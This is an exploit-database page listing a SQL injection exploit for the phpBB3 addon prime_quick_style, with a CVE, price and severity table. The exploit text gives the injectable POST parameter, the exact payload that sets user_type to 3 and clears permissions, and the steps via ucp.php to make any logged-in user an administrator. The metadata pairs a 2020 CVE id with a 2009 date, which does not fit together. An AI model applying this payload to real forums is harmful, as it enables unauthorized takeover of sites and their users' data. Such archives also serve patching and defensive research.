Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2020-13861 | CWE-89 | $500 | Critical |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2009-09-11 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
############# # #phpBB3 addon prime_quick_style GetAdmin Exploit # #Vulnerability found and exploited by -SmoG- # #target file: prime_quick_style.php # # # vuln: POST parameter "prime_quick_style" is injectable. # source: http://www.phpbb.com/community/viewtopic.php?f=70&t=692625 # #HowTo: after login, go to "./ucp.php" and manipulate the content from the "prime_quick_style"-parameter. #example: prime_quick_style = "5,user_type = 3, user_permissions = ''" # #query will be look like this: "UPDATE USER_TABLE SET user_style = ANY_STYLE(integer), user_type = 3, user_permissions = '' WHERE user_id = YourId" # #gratz, now u will be an admin :) # #--- greetz to Pronoobz.org --- AbiDez, ChinaSun and ~dp~ || Thanks you a lot! --- # # #-( by -SmoG- )- #############
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.